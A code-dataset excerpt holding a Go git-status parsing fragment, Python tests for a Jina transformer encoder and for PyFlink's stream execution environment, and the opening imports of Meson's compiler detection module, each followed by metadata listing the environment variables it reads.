return fmt.Errorf("invalid git status ordinary <XY> field: %q (%q)", entry.raw, entry.xy)
}
stageCode := entry.xy[0]
worktreeCode := entry.xy[1]
if stageCode != '.' {
result.Index.pathList = append(result.Index.pathList, entry.path)
result.Index.addToChecksum(entry.path)
}
if worktreeCode != '.' {
result.Worktree.pathList = append(result.Worktree.pathList, entry.path)
}
return nil
}
type untrackedEntry struct {
path string
raw string
}
// ? <path>
func parseUntrackedEntry(result *Result, entryLine string) error {
fields := strings.Fields(entryLine)
entry := untrackedEntry{
path: strings.Join(fields[1:], " "), // name with spaces
raw: entryLine,
}
result.UntrackedPathList = append(result.UntrackedPathList, entry.path)
return nil
}
func debug() bool {
return os.Getenv("WERF_DEBUG_GIT_STATUS") == "1"
}
| [
"\"WERF_DEBUG_GIT_STATUS\""
] | [] | [
"WERF_DEBUG_GIT_STATUS"
] | [] | ["WERF_DEBUG_GIT_STATUS"] | go | 1 | 0 | |
encoders/nlp/TransformerTorchEncoder/tests/test_transformertorchencoder.py | import os
import numpy as np
import pytest
from jina.executors import BaseExecutor
from jina.executors.metas import get_default_metas
from .. import TransformerTorchEncoder
@pytest.fixture(scope='function')
def test_metas(tmp_path):
metas = get_default_metas()
metas['workspace'] = str(tmp_path)
if 'JINA_TEST_GPU' in os.environ:
metas['on_gpu'] = True
yield metas
def get_encoder(test_metas, **kwargs):
if 'pretrained_model_name_or_path' in kwargs and 'pooling_strategy' in kwargs:
kwargs['model_save_path'] = (
kwargs['pretrained_model_name_or_path'].replace('/', '.')
+ f'-{kwargs["pooling_strategy"]}'
)
return TransformerTorchEncoder(metas=test_metas, **kwargs)
_models = [
'sentence-transformers/distilbert-base-nli-stsb-mean-tokens',
'sentence-transformers/bert-base-nli-stsb-mean-tokens',
'deepset/roberta-base-squad2',
'xlm-roberta-base',
'xlnet-base-cased',
]
def _assert_params_equal(params_dict: dict, encoder: TransformerTorchEncoder):
for key, val in params_dict.items():
assert val == getattr(encoder, key)
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['cls', 'mean', 'max'])
@pytest.mark.parametrize('layer_index', [-1, -2, 0])
def test_encoding_results(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index
}
encoder = get_encoder(test_metas, **params)
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
encoded_data = encoder.encode(test_data)
hidden_dim_sizes = {
'sentence-transformers/distilbert-base-nli-stsb-mean-tokens': 768,
'sentence-transformers/bert-base-nli-stsb-mean-tokens': 768,
'deepset/roberta-base-squad2': 768,
'xlm-roberta-base': 768,
'xlnet-base-cased': 768,
}
hidden_dim_size = hidden_dim_sizes[encoder.pretrained_model_name_or_path]
assert encoded_data.shape == (2, hidden_dim_size)
if encoder.pooling_strategy != 'cls' or encoder.layer_index != 0:
assert not np.allclose(encoded_data[0], encoded_data[1], rtol=1)
else:
assert np.allclose(encoded_data[0], encoded_data[1], atol=1e-5, rtol=1e-4)
@pytest.mark.parametrize('acceleration', ['amp', 'quant'])
def test_encoding_results_acceleration(test_metas, acceleration):
if 'JINA_TEST_GPU' in os.environ and acceleration == 'quant':
pytest.skip("Can't test quantization on GPU.")
encoder = get_encoder(test_metas, **{"acceleration": acceleration})
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
encoded_data = encoder.encode(test_data)
assert encoded_data.shape == (2, 768)
assert not np.allclose(encoded_data[0], encoded_data[1], rtol=1)
@pytest.mark.parametrize('model_name', ['bert-base-uncased'])
@pytest.mark.parametrize('pooling_strategy', ['cls', 'mean', 'max'])
@pytest.mark.parametrize('layer_index', [-1, -2])
def test_embedding_consistency(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index,
}
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
encoder = get_encoder(test_metas, **params)
encoded_data = encoder.encode(test_data)
encoded_data_file = f'tests/{model_name}-{pooling_strategy}-{layer_index}.npy'
enc_data_loaded = np.load(encoded_data_file)
np.testing.assert_allclose(encoded_data, enc_data_loaded, atol=1e-5, rtol=1e-6)
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['cls', 'mean', 'max'])
@pytest.mark.parametrize('layer_index', [-1])
def test_max_length_truncation(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index,
'max_length': 3
}
encoder = get_encoder(test_metas, **params)
test_data = np.array(['it is a very good day!', 'it is a very sunny day!'])
encoded_data = encoder.encode(test_data)
np.testing.assert_allclose(encoded_data[0], encoded_data[1], atol=1e-5, rtol=1e-4)
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['cls', 'mean', 'max'])
@pytest.mark.parametrize('layer_index', [-1, -2])
def test_shape_single_document(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index,
'max_length': 3
}
encoder = get_encoder(test_metas, **params)
test_data = np.array(['it is a very good day!'])
encoded_data = encoder.encode(test_data)
assert len(encoded_data.shape) == 2
assert encoded_data.shape[0] == 1
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['min'])
@pytest.mark.parametrize('layer_index', [-2])
def test_save_and_load(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index
}
encoder = get_encoder(test_metas, **params)
encoder.save_config()
_assert_params_equal(params, encoder)
assert os.path.exists(encoder.config_abspath)
test_data = np.array(['a', 'b', 'c', 'x', '!'])
encoded_data_control = encoder.encode(test_data)
encoder.touch()
encoder.save()
assert os.path.exists(encoder.save_abspath)
encoder_loaded = BaseExecutor.load(encoder.save_abspath)
_assert_params_equal(params, encoder_loaded)
encoded_data_test = encoder_loaded.encode(test_data)
np.testing.assert_array_equal(encoded_data_control, encoded_data_test)
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['min'])
@pytest.mark.parametrize('layer_index', [-2])
def test_save_and_load_config(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index
}
encoder = get_encoder(test_metas, **params)
encoder.save_config()
_assert_params_equal(params, encoder)
assert os.path.exists(encoder.config_abspath)
encoder_loaded = BaseExecutor.load_config(encoder.config_abspath)
_assert_params_equal(params, encoder_loaded)
@pytest.mark.parametrize('layer_index', [-100, 100])
def test_wrong_layer_index(test_metas, layer_index):
params = {'layer_index': layer_index}
encoder = get_encoder(test_metas, **params)
encoder.layer_index = layer_index
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
with pytest.raises(ValueError):
encoded_data = encoder.encode(test_data)
def test_wrong_pooling_strategy():
with pytest.raises(NotImplementedError):
TransformerTorchEncoder(pooling_strategy='wrong')
def test_wrong_pooling_acceleration():
with pytest.raises(NotImplementedError):
TransformerTorchEncoder(acceleration='wrong')
@pytest.mark.parametrize(
'params',
[{'pooling_strategy': 'cls', 'pretrained_model_name_or_path': 'gpt2'}],
)
def test_no_cls_token(test_metas, params):
encoder = get_encoder(test_metas, **params)
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
with pytest.raises(ValueError):
encoder.encode(test_data)
| [] | [] | [] | [] | [] | python | 0 | 0 | |
flink-python/pyflink/datastream/tests/test_stream_execution_environment.py | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import datetime
import decimal
import glob
import json
import os
import shutil
import tempfile
import time
import unittest
import uuid
from pyflink.common import ExecutionConfig, RestartStrategies
from pyflink.common.serialization import JsonRowDeserializationSchema
from pyflink.common.typeinfo import Types
from pyflink.datastream import (StreamExecutionEnvironment, CheckpointConfig,
CheckpointingMode, MemoryStateBackend, TimeCharacteristic)
from pyflink.datastream.connectors import FlinkKafkaConsumer
from pyflink.datastream.execution_mode import RuntimeExecutionMode
from pyflink.datastream.functions import SourceFunction
from pyflink.datastream.tests.test_util import DataStreamTestSinkFunction
from pyflink.find_flink_home import _find_flink_source_root
from pyflink.java_gateway import get_gateway
from pyflink.pyflink_gateway_server import on_windows
from pyflink.table import DataTypes, CsvTableSource, CsvTableSink, StreamTableEnvironment
from pyflink.testing.test_case_utils import PyFlinkTestCase, exec_insert_table, \
invoke_java_object_method
class StreamExecutionEnvironmentTests(PyFlinkTestCase):
def setUp(self):
self.env = StreamExecutionEnvironment.get_execution_environment()
self.env.set_parallelism(2)
self.test_sink = DataStreamTestSinkFunction()
def test_get_config(self):
execution_config = self.env.get_config()
self.assertIsInstance(execution_config, ExecutionConfig)
def test_get_set_parallelism(self):
self.env.set_parallelism(10)
parallelism = self.env.get_parallelism()
self.assertEqual(parallelism, 10)
def test_get_set_buffer_timeout(self):
self.env.set_buffer_timeout(12000)
timeout = self.env.get_buffer_timeout()
self.assertEqual(timeout, 12000)
def test_get_set_default_local_parallelism(self):
self.env.set_default_local_parallelism(8)
parallelism = self.env.get_default_local_parallelism()
self.assertEqual(parallelism, 8)
def test_set_get_restart_strategy(self):
self.env.set_restart_strategy(RestartStrategies.no_restart())
restart_strategy = self.env.get_restart_strategy()
self.assertEqual(restart_strategy, RestartStrategies.no_restart())
def test_add_default_kryo_serializer(self):
self.env.add_default_kryo_serializer(
"org.apache.flink.runtime.state.StateBackendTestBase$TestPojo",
"org.apache.flink.runtime.state.StateBackendTestBase$CustomKryoTestSerializer")
class_dict = self.env.get_config().get_default_kryo_serializer_classes()
self.assertEqual(class_dict,
{'org.apache.flink.runtime.state.StateBackendTestBase$TestPojo':
'org.apache.flink.runtime.state'
'.StateBackendTestBase$CustomKryoTestSerializer'})
def test_register_type_with_kryo_serializer(self):
self.env.register_type_with_kryo_serializer(
"org.apache.flink.runtime.state.StateBackendTestBase$TestPojo",
"org.apache.flink.runtime.state.StateBackendTestBase$CustomKryoTestSerializer")
class_dict = self.env.get_config().get_registered_types_with_kryo_serializer_classes()
self.assertEqual(class_dict,
{'org.apache.flink.runtime.state.StateBackendTestBase$TestPojo':
'org.apache.flink.runtime.state'
'.StateBackendTestBase$CustomKryoTestSerializer'})
def test_register_type(self):
self.env.register_type("org.apache.flink.runtime.state.StateBackendTestBase$TestPojo")
type_list = self.env.get_config().get_registered_pojo_types()
self.assertEqual(type_list,
['org.apache.flink.runtime.state.StateBackendTestBase$TestPojo'])
def test_get_set_max_parallelism(self):
self.env.set_max_parallelism(12)
parallelism = self.env.get_max_parallelism()
self.assertEqual(parallelism, 12)
def test_set_runtime_mode(self):
self.env.set_runtime_mode(RuntimeExecutionMode.BATCH)
config = invoke_java_object_method(
self.env._j_stream_execution_environment, "getConfiguration")
runtime_mode = config.getValue(
get_gateway().jvm.org.apache.flink.configuration.ExecutionOptions.RUNTIME_MODE)
self.assertEqual(runtime_mode, "BATCH")
def test_operation_chaining(self):
self.assertTrue(self.env.is_chaining_enabled())
self.env.disable_operator_chaining()
self.assertFalse(self.env.is_chaining_enabled())
def test_get_checkpoint_config(self):
checkpoint_config = self.env.get_checkpoint_config()
self.assertIsInstance(checkpoint_config, CheckpointConfig)
def test_get_set_checkpoint_interval(self):
self.env.enable_checkpointing(30000)
interval = self.env.get_checkpoint_interval()
self.assertEqual(interval, 30000)
def test_get_set_checkpointing_mode(self):
mode = self.env.get_checkpointing_mode()
self.assertEqual(mode, CheckpointingMode.EXACTLY_ONCE)
self.env.enable_checkpointing(30000, CheckpointingMode.AT_LEAST_ONCE)
mode = self.env.get_checkpointing_mode()
self.assertEqual(mode, CheckpointingMode.AT_LEAST_ONCE)
def test_get_state_backend(self):
state_backend = self.env.get_state_backend()
self.assertIsNone(state_backend)
def test_set_state_backend(self):
input_backend = MemoryStateBackend()
self.env.set_state_backend(input_backend)
output_backend = self.env.get_state_backend()
self.assertEqual(output_backend._j_memory_state_backend,
input_backend._j_memory_state_backend)
def test_get_set_stream_time_characteristic(self):
default_time_characteristic = self.env.get_stream_time_characteristic()
self.assertEqual(default_time_characteristic, TimeCharacteristic.EventTime)
self.env.set_stream_time_characteristic(TimeCharacteristic.ProcessingTime)
time_characteristic = self.env.get_stream_time_characteristic()
self.assertEqual(time_characteristic, TimeCharacteristic.ProcessingTime)
@unittest.skip("Python API does not support DataStream now. refactor this test later")
def test_get_execution_plan(self):
tmp_dir = tempfile.gettempdir()
source_path = os.path.join(tmp_dir + '/streaming.csv')
tmp_csv = os.path.join(tmp_dir + '/streaming2.csv')
field_names = ["a", "b", "c"]
field_types = [DataTypes.INT(), DataTypes.STRING(), DataTypes.STRING()]
t_env = StreamTableEnvironment.create(self.env)
csv_source = CsvTableSource(source_path, field_names, field_types)
t_env.register_table_source("Orders", csv_source)
t_env.register_table_sink(
"Results",
CsvTableSink(field_names, field_types, tmp_csv))
t_env.from_path("Orders").execute_insert("Results").wait()
plan = self.env.get_execution_plan()
json.loads(plan)
def test_execute(self):
tmp_dir = tempfile.gettempdir()
field_names = ['a', 'b', 'c']
field_types = [DataTypes.BIGINT(), DataTypes.STRING(), DataTypes.STRING()]
t_env = StreamTableEnvironment.create(self.env)
t_env.register_table_sink(
'Results',
CsvTableSink(field_names, field_types,
os.path.join('{}/{}.csv'.format(tmp_dir, round(time.time())))))
execution_result = exec_insert_table(
t_env.from_elements([(1, 'Hi', 'Hello')], ['a', 'b', 'c']),
'Results')
self.assertIsNotNone(execution_result.get_job_id())
self.assertIsNotNone(execution_result.get_net_runtime())
self.assertEqual(len(execution_result.get_all_accumulator_results()), 0)
self.assertIsNone(execution_result.get_accumulator_result('accumulator'))
self.assertIsNotNone(str(execution_result))
def test_from_collection_without_data_types(self):
ds = self.env.from_collection([(1, 'Hi', 'Hello'), (2, 'Hello', 'Hi')])
ds.add_sink(self.test_sink)
self.env.execute("test from collection")
results = self.test_sink.get_results(True)
# user does not specify data types for input data, the collected result should be in
# in tuple format as inputs.
expected = ["(1, 'Hi', 'Hello')", "(2, 'Hello', 'Hi')"]
results.sort()
expected.sort()
self.assertEqual(expected, results)
def test_from_collection_with_data_types(self):
# verify from_collection for the collection with single object.
ds = self.env.from_collection(['Hi', 'Hello'], type_info=Types.STRING())
ds.add_sink(self.test_sink)
self.env.execute("test from collection with single object")
results = self.test_sink.get_results(False)
expected = ['Hello', 'Hi']
results.sort()
expected.sort()
self.assertEqual(expected, results)
# verify from_collection for the collection with multiple objects like tuple.
ds = self.env.from_collection([(1, None, 1, True, 32767, -2147483648, 1.23, 1.98932,
bytearray(b'flink'), 'pyflink', datetime.date(2014, 9, 13),
datetime.time(hour=12, minute=0, second=0,
microsecond=123000),
datetime.datetime(2018, 3, 11, 3, 0, 0, 123000), [1, 2, 3],
decimal.Decimal('1000000000000000000.05'),
decimal.Decimal('1000000000000000000.0599999999999'
'9999899999999999')),
(2, None, 2, True, 43878, 9147483648, 9.87, 2.98936,
bytearray(b'flink'), 'pyflink', datetime.date(2015, 10, 14),
datetime.time(hour=11, minute=2, second=2,
microsecond=234500),
datetime.datetime(2020, 4, 15, 8, 2, 6, 235000), [2, 4, 6],
decimal.Decimal('2000000000000000000.74'),
decimal.Decimal('2000000000000000000.061111111111111'
'11111111111111'))],
type_info=Types.ROW(
[Types.LONG(), Types.LONG(), Types.SHORT(),
Types.BOOLEAN(), Types.SHORT(), Types.INT(),
Types.FLOAT(), Types.DOUBLE(),
Types.PICKLED_BYTE_ARRAY(),
Types.STRING(), Types.SQL_DATE(), Types.SQL_TIME(),
Types.SQL_TIMESTAMP(),
Types.BASIC_ARRAY(Types.LONG()), Types.BIG_DEC(),
Types.BIG_DEC()]))
ds.add_sink(self.test_sink)
self.env.execute("test from collection with tuple object")
results = self.test_sink.get_results(False)
# if user specifies data types of input data, the collected result should be in row format.
expected = [
'+I[1, null, 1, true, 32767, -2147483648, 1.23, 1.98932, [102, 108, 105, 110, 107], '
'pyflink, 2014-09-13, 12:00:00, 2018-03-11 03:00:00.123, [1, 2, 3], '
'1000000000000000000.05, 1000000000000000000.05999999999999999899999999999]',
'+I[2, null, 2, true, -21658, 557549056, 9.87, 2.98936, [102, 108, 105, 110, 107], '
'pyflink, 2015-10-14, 11:02:02, 2020-04-15 08:02:06.235, [2, 4, 6], '
'2000000000000000000.74, 2000000000000000000.06111111111111111111111111111]']
results.sort()
expected.sort()
self.assertEqual(expected, results)
def test_add_custom_source(self):
custom_source = SourceFunction("org.apache.flink.python.util.MyCustomSourceFunction")
ds = self.env.add_source(custom_source, type_info=Types.ROW([Types.INT(), Types.STRING()]))
ds.add_sink(self.test_sink)
self.env.execute("test add custom source")
results = self.test_sink.get_results(False)
expected = [
'+I[3, Mike]',
'+I[1, Marry]',
'+I[4, Ted]',
'+I[5, Jack]',
'+I[0, Bob]',
'+I[2, Henry]']
results.sort()
expected.sort()
self.assertEqual(expected, results)
def test_read_text_file(self):
texts = ["Mike", "Marry", "Ted", "Jack", "Bob", "Henry"]
text_file_path = self.tempdir + '/text_file'
with open(text_file_path, 'a') as f:
for text in texts:
f.write(text)
f.write('\n')
ds = self.env.read_text_file(text_file_path)
ds.add_sink(self.test_sink)
self.env.execute("test read text file")
results = self.test_sink.get_results()
results.sort()
texts.sort()
self.assertEqual(texts, results)
def test_execute_async(self):
ds = self.env.from_collection([(1, 'Hi', 'Hello'), (2, 'Hello', 'Hi')],
type_info=Types.ROW(
[Types.INT(), Types.STRING(), Types.STRING()]))
ds.add_sink(self.test_sink)
job_client = self.env.execute_async("test execute async")
job_id = job_client.get_job_id()
self.assertIsNotNone(job_id)
execution_result = job_client.get_job_execution_result().result()
self.assertEqual(str(job_id), str(execution_result.get_job_id()))
def test_add_python_file(self):
import uuid
python_file_dir = os.path.join(self.tempdir, "python_file_dir_" + str(uuid.uuid4()))
os.mkdir(python_file_dir)
python_file_path = os.path.join(python_file_dir, "test_stream_dependency_manage_lib.py")
with open(python_file_path, 'w') as f:
f.write("def add_two(a):\n return a + 2")
def plus_two_map(value):
from test_stream_dependency_manage_lib import add_two
return add_two(value)
self.env.add_python_file(python_file_path)
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(plus_two_map).add_sink(self.test_sink)
self.env.execute("test add python file")
result = self.test_sink.get_results(True)
expected = ['3', '4', '5', '6', '7']
result.sort()
expected.sort()
self.assertEqual(expected, result)
def test_set_requirements_without_cached_directory(self):
import uuid
requirements_txt_path = os.path.join(self.tempdir, str(uuid.uuid4()))
with open(requirements_txt_path, 'w') as f:
f.write("cloudpickle==1.2.2")
self.env.set_python_requirements(requirements_txt_path)
def check_requirements(i):
import cloudpickle
assert os.path.abspath(cloudpickle.__file__).startswith(
os.environ['_PYTHON_REQUIREMENTS_INSTALL_DIR'])
return i
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(check_requirements).add_sink(self.test_sink)
self.env.execute("test set requirements without cache dir")
result = self.test_sink.get_results(True)
expected = ['1', '2', '3', '4', '5']
result.sort()
expected.sort()
self.assertEqual(expected, result)
def test_set_requirements_with_cached_directory(self):
import uuid
tmp_dir = self.tempdir
requirements_txt_path = os.path.join(tmp_dir, "requirements_txt_" + str(uuid.uuid4()))
with open(requirements_txt_path, 'w') as f:
f.write("python-package1==0.0.0")
requirements_dir_path = os.path.join(tmp_dir, "requirements_dir_" + str(uuid.uuid4()))
os.mkdir(requirements_dir_path)
package_file_name = "python-package1-0.0.0.tar.gz"
with open(os.path.join(requirements_dir_path, package_file_name), 'wb') as f:
import base64
# This base64 data is encoded from a python package file which includes a
# "python_package1" module. The module contains a "plus(a, b)" function.
# The base64 can be recomputed by following code:
# base64.b64encode(open("python-package1-0.0.0.tar.gz", "rb").read()).decode("utf-8")
f.write(base64.b64decode(
"H4sICNefrV0C/2Rpc3QvcHl0aG9uLXBhY2thZ2UxLTAuMC4wLnRhcgDtmVtv2jAYhnPtX2H1CrRCY+ckI"
"XEx7axuUA11u5imyICTRc1JiVnHfv1MKKWjYxwKEdPehws7xkmUfH5f+3PyqfqWpa1cjG5EKFnLbOvfhX"
"FQTI3nOPPSdavS5Pa8nGMwy3Esi3ke9wyTObbnGNQxamBSKlFQavzUryG8ldG6frpbEGx4yNmDLMp/hPy"
"P8b+6fNN613vdP1z8XdteG3+ug/17/F3Hcw1qIv5H54NUYiyUaH2SRRllaYeytkl6IpEdujI2yH2XapCQ"
"wSRJRDHt0OveZa//uUfeZonUvUO5bHo+0ZcoVo9bMhFRvGx9H41kWj447aUsR0WUq+pui8arWKggK5Jli"
"wGOo/95q79ovXi6/nfyf246Dof/n078fT9KI+X77Xx6BP83bX4Xf5NxT7dz7toO/L8OxjKgeTwpG+KcDp"
"sdQjWFVJMipYI+o0MCk4X/t2UYtqI0yPabCHb3f861XcD/Ty/+Y5nLdCzT0dSPo/SmbKsf6un+b7KV+Ls"
"W4/D/OoC9w/930P9eGwM75//csrD+Q/6P/P/k9D/oX3988Wqw1bS/tf6tR+s/m3EG/ddBqXO9XKf15C8p"
"P9k4HZBtBgzZaVW5vrfKcj+W32W82ygEB9D/Xu9+4/qfP9L/rBv0X1v87yONKRX61/qfzwqjIDzIPTbv/"
"7or3/88i0H/tfBFW7s/s/avRInQH06ieEy7tDrQeYHUdRN7wP+n/vf62LOH/pld7f9xz7a5Pfufedy0oP"
"86iJI8KxStAq6yLC4JWdbbVbWRikR2z1ZGytk5vauW3QdnBFE6XqwmykazCesAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAOBw/AJw5CHBAFAAAA=="))
self.env.set_python_requirements(requirements_txt_path, requirements_dir_path)
def add_one(i):
from python_package1 import plus
return plus(i, 1)
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(add_one).add_sink(self.test_sink)
self.env.execute("test set requirements with cachd dir")
result = self.test_sink.get_results(True)
expected = ['2', '3', '4', '5', '6']
result.sort()
expected.sort()
self.assertEqual(expected, result)
def test_add_python_archive(self):
import uuid
import shutil
tmp_dir = self.tempdir
archive_dir_path = os.path.join(tmp_dir, "archive_" + str(uuid.uuid4()))
os.mkdir(archive_dir_path)
with open(os.path.join(archive_dir_path, "data.txt"), 'w') as f:
f.write("2")
archive_file_path = \
shutil.make_archive(os.path.dirname(archive_dir_path), 'zip', archive_dir_path)
self.env.add_python_archive(archive_file_path, "data")
def add_from_file(i):
with open("data/data.txt", 'r') as f:
return i + int(f.read())
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(add_from_file).add_sink(self.test_sink)
self.env.execute("test set python archive")
result = self.test_sink.get_results(True)
expected = ['3', '4', '5', '6', '7']
result.sort()
expected.sort()
self.assertEqual(expected, result)
@unittest.skipIf(on_windows(), "Symbolic link is not supported on Windows, skipping.")
def test_set_stream_env(self):
import sys
python_exec = sys.executable
tmp_dir = self.tempdir
python_exec_link_path = os.path.join(tmp_dir, "py_exec")
os.symlink(python_exec, python_exec_link_path)
self.env.set_python_executable(python_exec_link_path)
def check_python_exec(i):
import os
assert os.environ["python"] == python_exec_link_path
return i
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(check_python_exec).add_sink(self.test_sink)
self.env.execute("test set python executable")
result = self.test_sink.get_results(True)
expected = ['1', '2', '3', '4', '5']
result.sort()
expected.sort()
self.assertEqual(expected, result)
def test_add_jars(self):
# find kafka connector jars
flink_source_root = _find_flink_source_root()
jars_abs_path = flink_source_root + '/flink-connectors/flink-sql-connector-kafka'
specific_jars = glob.glob(jars_abs_path + '/target/flink*.jar')
specific_jars = ['file://' + specific_jar for specific_jar in specific_jars]
self.env.add_jars(*specific_jars)
source_topic = 'test_source_topic'
props = {'bootstrap.servers': 'localhost:9092', 'group.id': 'test_group'}
type_info = Types.ROW([Types.INT(), Types.STRING()])
# Test for kafka consumer
deserialization_schema = JsonRowDeserializationSchema.builder() \
.type_info(type_info=type_info).build()
# Will get a ClassNotFoundException if not add the kafka connector into the pipeline jars.
kafka_consumer = FlinkKafkaConsumer(source_topic, deserialization_schema, props)
self.env.add_source(kafka_consumer).print()
self.env.get_execution_plan()
def test_add_classpaths(self):
# find kafka connector jars
flink_source_root = _find_flink_source_root()
jars_abs_path = flink_source_root + '/flink-connectors/flink-sql-connector-kafka'
specific_jars = glob.glob(jars_abs_path + '/target/flink*.jar')
specific_jars = ['file://' + specific_jar for specific_jar in specific_jars]
self.env.add_classpaths(*specific_jars)
source_topic = 'test_source_topic'
props = {'bootstrap.servers': 'localhost:9092', 'group.id': 'test_group'}
type_info = Types.ROW([Types.INT(), Types.STRING()])
# Test for kafka consumer
deserialization_schema = JsonRowDeserializationSchema.builder() \
.type_info(type_info=type_info).build()
# It Will raise a ClassNotFoundException if the kafka connector is not added into the
# pipeline classpaths.
kafka_consumer = FlinkKafkaConsumer(source_topic, deserialization_schema, props)
self.env.add_source(kafka_consumer).print()
self.env.get_execution_plan()
def test_generate_stream_graph_with_dependencies(self):
python_file_dir = os.path.join(self.tempdir, "python_file_dir_" + str(uuid.uuid4()))
os.mkdir(python_file_dir)
python_file_path = os.path.join(python_file_dir, "test_stream_dependency_manage_lib.py")
with open(python_file_path, 'w') as f:
f.write("def add_two(a):\n return a + 2")
self.env.add_python_file(python_file_path)
def plus_two_map(value):
from test_stream_dependency_manage_lib import add_two
return value[0], add_two(value[1])
def add_from_file(i):
with open("data/data.txt", 'r') as f:
return i[0], i[1] + int(f.read())
from_collection_source = self.env.from_collection([('a', 0), ('b', 0), ('c', 1), ('d', 1),
('e', 2)],
type_info=Types.ROW([Types.STRING(),
Types.INT()]))
from_collection_source.name("From Collection")
keyed_stream = from_collection_source.key_by(lambda x: x[1], key_type=Types.INT())
plus_two_map_stream = keyed_stream.map(plus_two_map).name("Plus Two Map").set_parallelism(3)
add_from_file_map = plus_two_map_stream.map(add_from_file).name("Add From File Map")
test_stream_sink = add_from_file_map.add_sink(self.test_sink).name("Test Sink")
test_stream_sink.set_parallelism(4)
archive_dir_path = os.path.join(self.tempdir, "archive_" + str(uuid.uuid4()))
os.mkdir(archive_dir_path)
with open(os.path.join(archive_dir_path, "data.txt"), 'w') as f:
f.write("3")
archive_file_path = \
shutil.make_archive(os.path.dirname(archive_dir_path), 'zip', archive_dir_path)
self.env.add_python_archive(archive_file_path, "data")
nodes = eval(self.env.get_execution_plan())['nodes']
# The StreamGraph should be as bellow:
# Source: From Collection -> _stream_key_by_map_operator ->
# Plus Two Map -> Add From File Map -> Sink: Test Sink.
# Source: From Collection and _stream_key_by_map_operator should have same parallelism.
self.assertEqual(nodes[0]['parallelism'], nodes[1]['parallelism'])
# The parallelism of Plus Two Map should be 3
self.assertEqual(nodes[2]['parallelism'], 3)
# The ship_strategy for Source: From Collection and _stream_key_by_map_operator should be
# FORWARD
self.assertEqual(nodes[1]['predecessors'][0]['ship_strategy'], "FORWARD")
# The ship_strategy for _keyed_stream_values_operator and Plus Two Map should be
# HASH
self.assertEqual(nodes[2]['predecessors'][0]['ship_strategy'], "HASH")
# The parallelism of Sink: Test Sink should be 4
self.assertEqual(nodes[4]['parallelism'], 4)
env_config_with_dependencies = dict(get_gateway().jvm.org.apache.flink.python.util
.PythonConfigUtil.getEnvConfigWithDependencies(
self.env._j_stream_execution_environment).toMap())
# Make sure that user specified files and archives are correctly added.
self.assertIsNotNone(env_config_with_dependencies['python.files'])
self.assertIsNotNone(env_config_with_dependencies['python.archives'])
def tearDown(self) -> None:
self.test_sink.clear()
| [] | [] | [
"_PYTHON_REQUIREMENTS_INSTALL_DIR",
"python"
] | [] | ["_PYTHON_REQUIREMENTS_INSTALL_DIR", "python"] | python | 2 | 0 | |
mesonbuild/compilers/detect.py | # Copyright 2012-2021 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..mesonlib import (
MachineChoice, MesonException, EnvironmentException,
search_version, is_windows, Popen_safe, windows_proof_rm,
)
from ..envconfig import BinaryTable
from .. import mlog
from ..linkers import (
guess_win_linker,
guess_nix_linker,
AIXArLinker,
ArLinker,
ArmarLinker,
ArmClangDynamicLinker,
ArmDynamicLinker,
CcrxLinker,
CcrxDynamicLinker,
CompCertLinker,
CompCertDynamicLinker,
C2000Linker,
C2000DynamicLinker,
DLinker,
NAGDynamicLinker,
NvidiaHPC_DynamicLinker,
PGIDynamicLinker,
PGIStaticLinker,
StaticLinker,
Xc16Linker,
Xc16DynamicLinker,
XilinkDynamicLinker,
CudaLinker,
IntelVisualStudioLinker,
VisualStudioLinker,
VisualStudioLikeLinkerMixin,
WASMDynamicLinker,
)
from .compilers import Compiler
from .c import (
CCompiler,
AppleClangCCompiler,
ArmCCompiler,
ArmclangCCompiler,
ClangCCompiler,
ClangClCCompiler,
GnuCCompiler,
ElbrusCCompiler,
EmscriptenCCompiler,
IntelCCompiler,
IntelClCCompiler,
NvidiaHPC_CCompiler,
PGICCompiler,
